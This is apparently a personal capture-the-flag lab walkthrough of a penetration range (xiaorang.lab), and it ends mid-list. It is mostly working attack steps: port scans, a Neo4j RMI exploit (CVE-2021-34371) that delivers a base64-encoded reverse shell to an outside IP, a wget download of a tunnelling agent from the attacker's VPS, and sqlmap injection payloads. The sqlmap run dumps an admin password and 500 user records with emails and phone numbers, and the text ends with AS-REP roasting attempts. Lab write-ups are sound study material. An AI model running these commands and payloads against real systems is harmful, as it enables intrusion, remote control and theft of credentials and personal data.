time

flag01

39.98.107.186

cd "/mnt/d/软件工具/渗透/tools/tools/fscan_all_version/fscan_all_version"

q1n9@LAPTOP-3H92FD9J:/mnt/d/软件工具/渗透/tools/tools/fscan_all_version/fscan_all_version$ ./fscan -h 39.98.107.186 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.98.107.186:22 open
39.98.107.186:1337 open
39.98.107.186:7474 open
39.98.107.186:7473 open
39.98.107.186:7687 open
39.98.107.186:41409 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://39.98.107.186:7474 code:303 len:0      title:None 跳转url: http://39.98.107.186:7474/browser/
[*] WebTitle http://39.98.107.186:7474/browser/ code:200 len:3279   title:Neo4j Browser
[*] WebTitle https://39.98.107.186:7473 code:303 len:0      title:None 跳转url: https://39.98.107.186:7473/browser/
[*] WebTitle https://39.98.107.186:7687 code:400 len:50     title:None
[*] WebTitle https://39.98.107.186:7473/browser/ code:200 len:3279   title:Neo4j Browser
已完成 6/6
[*] 扫描结束,耗时: 2m52.002536904s

Reference: CVE-2021-34371 Neo4j-Shell vulnerability reproduction - 凪白Kw - 博客园 (cnblogs)

bash -i >& /dev/tcp/139.129.20.156/7777 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTI5LjIwLjE1Ni83Nzc3IDA+JjE=

java -jar .\rhino_gadget.jar rmi://39.99.150.67:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTI5LjIwLjE1Ni83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"


D:\软件工具\渗透\tools\马\CVE-2021-34371.jar-main>java -jar .\rhino_gadget.jar rmi://39.99.150.67:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTI5LjIwLjE1Ni83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"
Trying to enumerate server bindings:
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is:
        java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
        java.io.IOException
[+] Exploit completed

flag01: flag{71d59e48-f05f-43d4-8d98-3917d37ff490}


flag02

Start Python's built-in HTTP server on the VPS:
put the files to be downloaded in the directory where you run the python command, then run the command below
python3 -m http.server 80
Then download from the shell on the target machine with the command below; the IP here is the public address of our VPS and the path is the file name
wget http://139.129.20.156/linux_x64_agent

cd "/mnt/d/软件工具/渗透/tools/tools/Stotaway-bin/Stotaway-bin"
./linux_x64_admin -c 39.99.150.67:11111 -s 123
./linux_x64_agent -l 11111 -s 123


./linux_x64_agent -l 11112 -s 123
./windows_x64_admin.exe -c 39.98.107.186:11112 -s 123
upload /home/q1n9/fscan /tmp/1/fscan
neo4j@ubuntu:/tmp/1$ ip addr
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:02:f4:52 brd ff:ff:ff:ff:ff:ff
    inet 172.22.6.36/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 1892154314sec preferred_lft 1892154314sec
    inet6 fe80::216:3eff:fe02:f452/64 scope link
       valid_lft forever preferred_lft forever
 chmod +x  ./fscan
 ./fscan -h 172.22.6.0/24
download /tmp/1/result.txt /home/q1n9/result.txt

172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.36:7687 open
172.22.6.12:445 open
172.22.6.25:445 open
172.22.6.12:88 open
172.22.6.12:139 open
172.22.6.25:139 open
172.22.6.12:135 open
172.22.6.25:135 open
172.22.6.38:80 open
[*] WebTitle http://172.22.6.38        code:200 len:1531   title:后台登录
[*] NetInfo 
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] NetInfo 
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] NetBios 172.22.6.25     XIAORANG\WIN2019              
[*] OsInfo 172.22.6.12	(Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.6.12     [+] DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
# Role: domain controller (DC:DC-PROGAME.xiaorang.lab); the domain name is xiaorang.lab.
[*] WebTitle https://172.22.6.36:7687  code:400 len:50     title:None

As can be seen, 172.22.6.25 is a domain member and 172.22.6.12 is the domain controller.

Opening http://172.22.6.38/index.php shows a login page.

POST /index.php HTTP/1.1
Host: 172.22.6.38
Content-Length: 27
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

username=admin&password=123

So we go straight to sqlmap.

┌──(q1n9㉿LAPTOP-3H92FD9J)-[~]
└─$ proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:56:37 /2025-08-08/

[21:56:37] [INFO] resuming back-end DBMS 'mysql'
[21:56:37] [INFO] testing connection to the target URL
[proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.6.38:80 [proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.6.38:80  ...  OK
 ...  OK
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 6533 FROM (SELECT(SLEEP(5)))kbVs) AND 'dqCy'='dqCy&password=123

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x716a707671,0x74734f4e524b445a59774e68514f6b6a705159546a42734a446854626c516452704c7a79704e4d42,0x7162717a71),NULL-- -&password=123
---
[21:56:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:56:37] [INFO] fetched data logged to text files under '/home/q1n9/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 21:56:37 /2025-08-08/


proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123" --dbs
[*] information_schema
[*] mysql
[*] oa_db
[*] performance_schema
[*] sys

proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123" -D 数据库名 -T 表名 --dump

proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123" -D oa_db --dump
[1 entry]
+----+--------------------------------------------+
| id | flag02                                     |
+----+--------------------------------------------+
| 1  | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+

[21:58:47] [INFO] table 'oa_db.oa_f1Agggg' dumped to CSV file '/home/q1n9/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_f1Agggg.csv'
[21:58:47] [INFO] fetching columns for table 'oa_admin' in database 'oa_db'
[proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.6.38:80  ...  OK
 ...  OK
[21:58:47] [INFO] fetching entries for table 'oa_admin' in database 'oa_db'
[proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.6.38:80 Database: oa_db
Table: oa_admin
[1 entry]
+----+------------------+---------------+
| id | password         | username      |
+----+------------------+---------------+
| 1  | bo2y8kAL3HnXUiQo | administrator |
+----+------------------+---------------+

[21:58:47] [INFO] table 'oa_db.oa_admin' dumped to CSV file '/home/q1n9/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_admin.csv'
[21:58:47] [INFO] fetching columns for table 'oa_users' in database 'oa_db'
[proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.6.38:80  ...  OK
 ...  OK
[21:58:47] [INFO] fetching entries for table 'oa_users' in database 'oa_db'
[proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.6.38:80  ...  OK
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id  | email                      | phone       | username        |
+-----+----------------------------+-------------+-----------------+
[21:58:48] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 245 | chenyan@xiaorang.lab       | 18281528743 | CHEN YAN        |
| 246 | tanggui@xiaorang.lab       | 18060615547 | TANG GUI        |
| 247 | buning@xiaorang.lab        | 13046481392 | BU NING         |
| 248 | beishu@xiaorang.lab        | 18268508400 | BEI SHU         |
| 249 | shushi@xiaorang.lab        | 17770383196 | SHU SHI         |
| 250 | fuyi@xiaorang.lab          | 18902082658 | FU YI           |
| 251 | pangcheng@xiaorang.lab     | 18823789530 | PANG CHENG      |
| 252 | tonghao@xiaorang.lab       | 13370873526 | TONG HAO        |
| 253 | jiaoshan@xiaorang.lab      | 15375905173 | JIAO SHAN       |
| 254 | dulun@xiaorang.lab         | 13352331157 | DU LUN          |
| 255 | kejuan@xiaorang.lab        | 13222550481 | KE JUAN         |
| 256 | gexin@xiaorang.lab         | 18181553086 | GE XIN          |
| 257 | lugu@xiaorang.lab          | 18793883130 | LU GU           |
| 258 | guzaicheng@xiaorang.lab    | 15309377043 | GU ZAI CHENG    |
| 259 | feicai@xiaorang.lab        | 13077435367 | FEI CAI         |
| 260 | ranqun@xiaorang.lab        | 18239164662 | RAN QUN         |
| 261 | zhouyi@xiaorang.lab        | 13169264671 | ZHOU YI         |
| 262 | shishu@xiaorang.lab        | 18592890189 | SHI SHU         |
| 263 | yanyun@xiaorang.lab        | 15071085768 | YAN YUN         |
| 264 | chengqiu@xiaorang.lab      | 13370162980 | CHENG QIU       |
| 265 | louyou@xiaorang.lab        | 13593582379 | LOU YOU         |
| 266 | maqun@xiaorang.lab         | 15235945624 | MA QUN          |
| 267 | wenbiao@xiaorang.lab       | 13620643639 | WEN BIAO        |
| 268 | weishengshan@xiaorang.lab  | 18670502260 | WEI SHENG SHAN  |
| 269 | zhangxin@xiaorang.lab      | 15763185760 | ZHANG XIN       |
| 270 | chuyuan@xiaorang.lab       | 18420545268 | CHU YUAN        |
| 271 | wenliang@xiaorang.lab      | 13601678032 | WEN LIANG       |
| 272 | yulvxue@xiaorang.lab       | 18304374901 | YU LV XUE       |
| 273 | luyue@xiaorang.lab         | 18299785575 | LU YUE          |
| 274 | ganjian@xiaorang.lab       | 18906111021 | GAN JIAN        |
| 275 | pangzhen@xiaorang.lab      | 13479328562 | PANG ZHEN       |
| 276 | guohong@xiaorang.lab       | 18510220597 | GUO HONG        |
| 277 | lezhong@xiaorang.lab       | 15320909285 | LE ZHONG        |
| 278 | sheweiyue@xiaorang.lab     | 13736399596 | SHE WEI YUE     |
| 279 | dujian@xiaorang.lab        | 15058892639 | DU JIAN         |
| 280 | lidongjin@xiaorang.lab     | 18447207007 | LI DONG JIN     |
| 281 | hongqun@xiaorang.lab       | 15858462251 | HONG QUN        |
| 282 | yexing@xiaorang.lab        | 13719043564 | YE XING         |
| 283 | maoda@xiaorang.lab         | 13878840690 | MAO DA          |
| 284 | qiaomei@xiaorang.lab       | 13053207462 | QIAO MEI        |
| 285 | nongzhen@xiaorang.lab      | 15227699960 | NONG ZHEN       |
| 286 | dongshu@xiaorang.lab       | 15695562947 | DONG SHU        |
| 287 | zhuzhu@xiaorang.lab        | 13070163385 | ZHU ZHU         |
| 288 | jiyun@xiaorang.lab         | 13987332999 | JI YUN          |
| 289 | qiguanrou@xiaorang.lab     | 15605983582 | QI GUAN ROU     |
| 290 | yixue@xiaorang.lab         | 18451603140 | YI XUE          |
| 291 | chujun@xiaorang.lab        | 15854942459 | CHU JUN         |
| 292 | shenshan@xiaorang.lab      | 17712052191 | SHEN SHAN       |
| 293 | lefen@xiaorang.lab         | 13271196544 | LE FEN          |
| 294 | yubo@xiaorang.lab          | 13462202742 | YU BO           |
| 295 | helianrui@xiaorang.lab     | 15383000907 | HE LIAN RUI     |
| 296 | xuanqun@xiaorang.lab       | 18843916267 | XUAN QUN        |
| 297 | shangjun@xiaorang.lab      | 15162486698 | SHANG JUN       |
| 298 | huguang@xiaorang.lab       | 18100586324 | HU GUANG        |
| 299 | wansifu@xiaorang.lab       | 18494761349 | WAN SI FU       |
| 300 | fenghong@xiaorang.lab      | 13536727314 | FENG HONG       |
| 301 | wanyan@xiaorang.lab        | 17890844429 | WAN YAN         |
| 302 | diyan@xiaorang.lab         | 18534028047 | DI YAN          |
| 303 | xiangyu@xiaorang.lab       | 13834043047 | XIANG YU        |
| 304 | songyan@xiaorang.lab       | 15282433280 | SONG YAN        |
| 305 | fandi@xiaorang.lab         | 15846960039 | FAN DI          |
| 306 | xiangjuan@xiaorang.lab     | 18120327434 | XIANG JUAN      |
| 307 | beirui@xiaorang.lab        | 18908661803 | BEI RUI         |
| 308 | didi@xiaorang.lab          | 13413041463 | DI DI           |
| 309 | zhubin@xiaorang.lab        | 15909558554 | ZHU BIN         |
| 310 | lingchun@xiaorang.lab      | 13022790678 | LING CHUN       |
| 311 | zhenglu@xiaorang.lab       | 13248244873 | ZHENG LU        |
| 312 | xundi@xiaorang.lab         | 18358493414 | XUN DI          |
| 313 | wansishun@xiaorang.lab     | 18985028319 | WAN SI SHUN     |
| 314 | yezongyue@xiaorang.lab     | 13866302416 | YE ZONG YUE     |
| 315 | bianmei@xiaorang.lab       | 18540879992 | BIAN MEI        |
| 316 | shanshao@xiaorang.lab      | 18791488918 | SHAN SHAO       |
| 317 | zhenhui@xiaorang.lab       | 13736784817 | ZHEN HUI        |
| 318 | chengli@xiaorang.lab       | 15913267394 | CHENG LI        |
| 319 | yufen@xiaorang.lab         | 18432795588 | YU FEN          |
| 320 | jiyi@xiaorang.lab          | 13574211454 | JI YI           |
| 321 | panbao@xiaorang.lab        | 13675851303 | PAN BAO         |
| 322 | mennane@xiaorang.lab       | 15629706208 | MEN NAN E       |
| 323 | fengsi@xiaorang.lab        | 13333432577 | FENG SI         |
| 324 | mingyan@xiaorang.lab       | 18296909463 | MING YAN        |
| 325 | luoyou@xiaorang.lab        | 15759321415 | LUO YOU         |
| 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING |
| 327 | nongyan@xiaorang.lab       | 18097386975 | NONG YAN        |
| 328 | haolun@xiaorang.lab        | 15152700465 | HAO LUN         |
| 329 | oulun@xiaorang.lab         | 13402760696 | OU LUN          |
| 330 | weichipeng@xiaorang.lab    | 18057058937 | WEI CHI PENG    |
| 331 | qidiaofang@xiaorang.lab    | 18728297829 | QI DIAO FANG    |
| 332 | xuehe@xiaorang.lab         | 13398862169 | XUE HE          |
| 333 | chensi@xiaorang.lab        | 18030178713 | CHEN SI         |
| 334 | guihui@xiaorang.lab        | 17882514129 | GUI HUI         |
| 335 | fuyue@xiaorang.lab         | 18298436549 | FU YUE          |
| 336 | wangxing@xiaorang.lab      | 17763645267 | WANG XING       |
| 337 | zhengxiao@xiaorang.lab     | 18673968392 | ZHENG XIAO      |
| 338 | guhui@xiaorang.lab         | 15166711352 | GU HUI          |
| 339 | baoai@xiaorang.lab         | 15837430827 | BAO AI          |
| 340 | hangzhao@xiaorang.lab      | 13235488232 | HANG ZHAO       |
| 341 | xingye@xiaorang.lab        | 13367587521 | XING YE         |
| 342 | qianyi@xiaorang.lab        | 18657807767 | QIAN YI         |
| 343 | xionghong@xiaorang.lab     | 17725874584 | XIONG HONG      |
| 344 | zouqi@xiaorang.lab         | 15300430128 | ZOU QI          |
| 345 | rongbiao@xiaorang.lab      | 13034242682 | RONG BIAO       |
| 346 | gongxin@xiaorang.lab       | 15595839880 | GONG XIN        |
| 347 | luxing@xiaorang.lab        | 18318675030 | LU XING         |
| 348 | huayan@xiaorang.lab        | 13011805354 | HUA YAN         |
| 349 | duyue@xiaorang.lab         | 15515878208 | DU YUE          |
| 350 | xijun@xiaorang.lab         | 17871583183 | XI JUN          |
| 351 | daiqing@xiaorang.lab       | 18033226216 | DAI QING        |
| 352 | yingbiao@xiaorang.lab      | 18633421863 | YING BIAO       |
| 353 | hengteng@xiaorang.lab      | 15956780740 | HENG TENG       |
| 354 | changwu@xiaorang.lab       | 15251485251 | CHANG WU        |
| 355 | chengying@xiaorang.lab     | 18788248715 | CHENG YING      |
| 356 | luhong@xiaorang.lab        | 17766091079 | LU HONG         |
| 357 | tongxue@xiaorang.lab       | 18466102780 | TONG XUE        |
| 358 | xiangqian@xiaorang.lab     | 13279611385 | XIANG QIAN      |
| 359 | shaokang@xiaorang.lab      | 18042645434 | SHAO KANG       |
| 360 | nongzhu@xiaorang.lab       | 13934236634 | NONG ZHU        |
| 361 | haomei@xiaorang.lab        | 13406913218 | HAO MEI         |
| 362 | maoqing@xiaorang.lab       | 15713298425 | MAO QING        |
| 363 | xiai@xiaorang.lab          | 18148404789 | XI AI           |
| 364 | bihe@xiaorang.lab          | 13628593791 | BI HE           |
| 365 | gaoli@xiaorang.lab         | 15814408188 | GAO LI          |
| 366 | jianggong@xiaorang.lab     | 15951118926 | JIANG GONG      |
| 367 | pangning@xiaorang.lab      | 13443921700 | PANG NING       |
| 368 | ruishi@xiaorang.lab        | 15803112819 | RUI SHI         |
| 369 | wuhuan@xiaorang.lab        | 13646953078 | WU HUAN         |
| 370 | qiaode@xiaorang.lab        | 13543564200 | QIAO DE         |
| 371 | mayong@xiaorang.lab        | 15622971484 | MA YONG         |
| 372 | hangda@xiaorang.lab        | 15937701659 | HANG DA         |
| 373 | changlu@xiaorang.lab       | 13734991654 | CHANG LU        |
| 374 | liuyuan@xiaorang.lab       | 15862054540 | LIU YUAN        |
| 375 | chenggu@xiaorang.lab       | 15706685526 | CHENG GU        |
| 376 | shentuyun@xiaorang.lab     | 15816902379 | SHEN TU YUN     |
| 377 | zhuangsong@xiaorang.lab    | 17810274262 | ZHUANG SONG     |
| 378 | chushao@xiaorang.lab       | 18822001640 | CHU SHAO        |
| 379 | heli@xiaorang.lab          | 13701347081 | HE LI           |
| 380 | haoming@xiaorang.lab       | 15049615282 | HAO MING        |
| 381 | xieyi@xiaorang.lab         | 17840660107 | XIE YI          |
| 382 | shangjie@xiaorang.lab      | 15025010410 | SHANG JIE       |
| 383 | situxin@xiaorang.lab       | 18999728941 | SI TU XIN       |
| 384 | linxi@xiaorang.lab         | 18052976097 | LIN XI          |
| 385 | zoufu@xiaorang.lab         | 15264535633 | ZOU FU          |
| 386 | qianqing@xiaorang.lab      | 18668594658 | QIAN QING       |
| 387 | qiai@xiaorang.lab          | 18154690198 | QI AI           |
| 388 | ruilin@xiaorang.lab        | 13654483014 | RUI LIN         |
| 389 | luomeng@xiaorang.lab       | 15867095032 | LUO MENG        |
| 390 | huaren@xiaorang.lab        | 13307653720 | HUA REN         |
| 391 | yanyangmei@xiaorang.lab    | 15514015453 | YAN YANG MEI    |
| 392 | zuofen@xiaorang.lab        | 15937087078 | ZUO FEN         |
| 393 | manyuan@xiaorang.lab       | 18316106061 | MAN YUAN        |
| 394 | yuhui@xiaorang.lab         | 18058257228 | YU HUI          |
| 395 | sunli@xiaorang.lab         | 18233801124 | SUN LI          |
| 396 | guansixin@xiaorang.lab     | 13607387740 | GUAN SI XIN     |
| 397 | ruisong@xiaorang.lab       | 13306021674 | RUI SONG        |
| 398 | qiruo@xiaorang.lab         | 13257810331 | QI RUO          |
| 399 | jinyu@xiaorang.lab         | 18565922652 | JIN YU          |
| 400 | shoujuan@xiaorang.lab      | 18512174415 | SHOU JUAN       |
| 401 | yanqian@xiaorang.lab       | 13799789435 | YAN QIAN        |
| 402 | changyun@xiaorang.lab      | 18925015029 | CHANG YUN       |
| 403 | hualu@xiaorang.lab         | 13641470801 | HUA LU          |
| 404 | huanming@xiaorang.lab      | 15903282860 | HUAN MING       |
| 405 | baoshao@xiaorang.lab       | 13795275611 | BAO SHAO        |
| 406 | hongmei@xiaorang.lab       | 13243605925 | HONG MEI        |
| 407 | manyun@xiaorang.lab        | 13238107359 | MAN YUN         |
| 408 | changwan@xiaorang.lab      | 13642205622 | CHANG WAN       |
| 409 | wangyan@xiaorang.lab       | 13242486231 | WANG YAN        |
| 410 | shijian@xiaorang.lab       | 15515077573 | SHI JIAN        |
| 411 | ruibei@xiaorang.lab        | 18157706586 | RUI BEI         |
| 412 | jingshao@xiaorang.lab      | 18858376544 | JING SHAO       |
| 413 | jinzhi@xiaorang.lab        | 18902437082 | JIN ZHI         |
| 414 | yuhui@xiaorang.lab         | 15215599294 | YU HUI          |
| 415 | zangpeng@xiaorang.lab      | 18567574150 | ZANG PENG       |
| 416 | changyun@xiaorang.lab      | 15804640736 | CHANG YUN       |
| 417 | yetai@xiaorang.lab         | 13400150018 | YE TAI          |
| 418 | luoxue@xiaorang.lab        | 18962643265 | LUO XUE         |
| 419 | moqian@xiaorang.lab        | 18042706956 | MO QIAN         |
| 420 | xupeng@xiaorang.lab        | 15881934759 | XU PENG         |
| 421 | ruanyong@xiaorang.lab      | 15049703903 | RUAN YONG       |
| 422 | guliangxian@xiaorang.lab   | 18674282714 | GU LIANG XIAN   |
| 423 | yinbin@xiaorang.lab        | 15734030492 | YIN BIN         |
| 424 | huarui@xiaorang.lab        | 17699257041 | HUA RUI         |
| 425 | niuya@xiaorang.lab         | 13915041589 | NIU YA          |
| 426 | guwei@xiaorang.lab         | 13584571917 | GU WEI          |
| 427 | qinguan@xiaorang.lab       | 18427953434 | QIN GUAN        |
| 428 | yangdanhan@xiaorang.lab    | 15215900100 | YANG DAN HAN    |
| 429 | yingjun@xiaorang.lab       | 13383367818 | YING JUN        |
| 430 | weiwan@xiaorang.lab        | 13132069353 | WEI WAN         |
| 431 | sunduangu@xiaorang.lab     | 15737981701 | SUN DUAN GU     |
| 432 | sisiwu@xiaorang.lab        | 18021600640 | SI SI WU        |
| 433 | nongyan@xiaorang.lab       | 13312613990 | NONG YAN        |
| 434 | xuanlu@xiaorang.lab        | 13005748230 | XUAN LU         |
| 435 | yunzhong@xiaorang.lab      | 15326746780 | YUN ZHONG       |
| 436 | gengfei@xiaorang.lab       | 13905027813 | GENG FEI        |
| 437 | zizhuansong@xiaorang.lab   | 13159301262 | ZI ZHUAN SONG   |
| 438 | ganbailong@xiaorang.lab    | 18353612904 | GAN BAI LONG    |
| 439 | shenjiao@xiaorang.lab      | 15164719751 | SHEN JIAO       |
| 440 | zangyao@xiaorang.lab       | 18707028470 | ZANG YAO        |
| 441 | yangdanhe@xiaorang.lab     | 18684281105 | YANG DAN HE     |
| 442 | chengliang@xiaorang.lab    | 13314617161 | CHENG LIANG     |
| 443 | xudi@xiaorang.lab          | 18498838233 | XU DI           |
| 444 | wulun@xiaorang.lab         | 18350490780 | WU LUN          |
| 445 | yuling@xiaorang.lab        | 18835870616 | YU LING         |
| 446 | taoya@xiaorang.lab         | 18494928860 | TAO YA          |
| 447 | jinle@xiaorang.lab         | 15329208123 | JIN LE          |
| 448 | youchao@xiaorang.lab       | 13332964189 | YOU CHAO        |
| 449 | liangduanzhi@xiaorang.lab  | 15675237494 | LIANG DUAN ZHI  |
| 450 | jiagupiao@xiaorang.lab     | 17884962455 | JIA GU PIAO     |
| 451 | ganze@xiaorang.lab         | 17753508925 | GAN ZE          |
| 452 | jiangqing@xiaorang.lab     | 15802357200 | JIANG QING      |
| 453 | jinshan@xiaorang.lab       | 13831466303 | JIN SHAN        |
| 454 | zhengpubei@xiaorang.lab    | 13690156563 | ZHENG PU BEI    |
| 455 | cuicheng@xiaorang.lab      | 17641589842 | CUI CHENG       |
| 456 | qiyong@xiaorang.lab        | 13485427829 | QI YONG         |
| 457 | qizhu@xiaorang.lab         | 18838859844 | QI ZHU          |
| 458 | ganjian@xiaorang.lab       | 18092585003 | GAN JIAN        |
| 459 | yurui@xiaorang.lab         | 15764121637 | YU RUI          |
| 460 | feishu@xiaorang.lab        | 18471512248 | FEI SHU         |
| 461 | chenxin@xiaorang.lab       | 13906545512 | CHEN XIN        |
| 462 | shengzhe@xiaorang.lab      | 18936457394 | SHENG ZHE       |
| 463 | wohong@xiaorang.lab        | 18404022650 | WO HONG         |
| 464 | manzhi@xiaorang.lab        | 15973350408 | MAN ZHI         |
| 465 | xiangdong@xiaorang.lab     | 13233908989 | XIANG DONG      |
| 466 | weihui@xiaorang.lab        | 15035834945 | WEI HUI         |
| 467 | xingquan@xiaorang.lab      | 18304752969 | XING QUAN       |
| 468 | miaoshu@xiaorang.lab       | 15121570939 | MIAO SHU        |
| 469 | gongwan@xiaorang.lab       | 18233990398 | GONG WAN        |
| 470 | qijie@xiaorang.lab         | 15631483536 | QI JIE          |
| 471 | shaoting@xiaorang.lab      | 15971628914 | SHAO TING       |
| 472 | xiqi@xiaorang.lab          | 18938747522 | XI QI           |
| 473 | jinghong@xiaorang.lab      | 18168293686 | JING HONG       |
| 474 | qianyou@xiaorang.lab       | 18841322688 | QIAN YOU        |
| 475 | chuhua@xiaorang.lab        | 15819380754 | CHU HUA         |
| 476 | yanyue@xiaorang.lab        | 18702474361 | YAN YUE         |
| 477 | huangjia@xiaorang.lab      | 13006878166 | HUANG JIA       |
| 478 | zhouchun@xiaorang.lab      | 13545820679 | ZHOU CHUN       |
| 479 | jiyu@xiaorang.lab          | 18650881187 | JI YU           |
| 480 | wendong@xiaorang.lab       | 17815264093 | WEN DONG        |
| 481 | heyuan@xiaorang.lab        | 18710821773 | HE YUAN         |
| 482 | mazhen@xiaorang.lab        | 18698248638 | MA ZHEN         |
| 483 | shouchun@xiaorang.lab      | 15241369178 | SHOU CHUN       |
| 484 | liuzhe@xiaorang.lab        | 18530936084 | LIU ZHE         |
| 485 | fengbo@xiaorang.lab        | 15812110254 | FENG BO         |
| 486 | taigongyuan@xiaorang.lab   | 15943349034 | TAI GONG YUAN   |
| 487 | gesheng@xiaorang.lab       | 18278508909 | GE SHENG        |
| 488 | songming@xiaorang.lab      | 13220512663 | SONG MING       |
| 489 | yuwan@xiaorang.lab         | 15505678035 | YU WAN          |
| 490 | diaowei@xiaorang.lab       | 13052582975 | DIAO WEI        |
| 491 | youyi@xiaorang.lab         | 18036808394 | YOU YI          |
| 492 | rongxianyu@xiaorang.lab    | 18839918955 | RONG XIAN YU    |
| 493 | fuyi@xiaorang.lab          | 15632151678 | FU YI           |
| 494 | linli@xiaorang.lab         | 17883399275 | LIN LI          |
| 495 | weixue@xiaorang.lab        | 18672465853 | WEI XUE         |
| 496 | hejuan@xiaorang.lab        | 13256081102 | HE JUAN         |
| 497 | zuoqiutai@xiaorang.lab     | 18093001354 | ZUO QIU TAI     |
| 498 | siyi@xiaorang.lab          | 17873307773 | SI YI           |
| 499 | shenshan@xiaorang.lab      | 18397560369 | SHEN SHAN       |
| 500 | tongdong@xiaorang.lab      | 15177549595 | TONG DONG       |
+-----+----------------------------+-------------+-----------------+

[21:58:48] [INFO] table 'oa_db.oa_users' dumped to CSV file '/home/q1n9/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_users.csv'
[21:58:48] [INFO] fetched data logged to text files under '/home/q1n9/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 21:58:48 /2025-08-08/


flag03&04

Extract the usernames with a script

# Read the file containing the table data (assumed to be saved as data.txt in the current directory)
with open("data.txt", "r", encoding="utf-8") as f:
    lines = f.readlines()

# Extract the username column and write it to a file
with open("username.txt", "w", encoding="utf-8") as out:
    for line in lines:
        # Skip the header row and blank lines
        if "username" in line or not line.strip():
            continue
        # Split on the pipe character; because each row starts with '|',
        # the username is the 5th field (index 4), so at least 5 parts are needed
        parts = line.split("|")
        if len(parts) >= 5:
            username = parts[4].strip()
            if username:  # make sure the cell is not empty
                out.write(username + "\n")

Judging from the run output, when impacket-GetNPUsers attempted AS-REP Roasting against the users in username.txt, every user returned the KDC_ERR_C_PRINCIPAL_UNKNOWN error, which means these users do not exist in the KDC database of the target domain (xiaorang.lab). The specific causes and the way forward are as follows:

Core cause analysis

  1. The user list does not match the target domain
    The users in username.txt (such as CHEN YAN, TANG GUI, etc.) may belong to another domain or be local users rather than domain users of xiaorang.lab, so the KDC cannot recognize them.
  2. Wrong username format
    Domain usernames usually require a strict format (for example username rather than USER NAME, with no spaces), while the list contains usernames with spaces (such as CHEN YAN), which may not match the actual usernames stored in the KDC (such as chenyan or chen.yan).
  3. The user does not have Kerberos pre-authentication disabled
    Even if a user exists, if Kerberos pre-authentication has not been disabled GetNPUsers cannot obtain an AS-REP response; however, that case does not return a "user does not exist" error, so it can be ruled out.

Suggested fixes

  1. Fix the username format

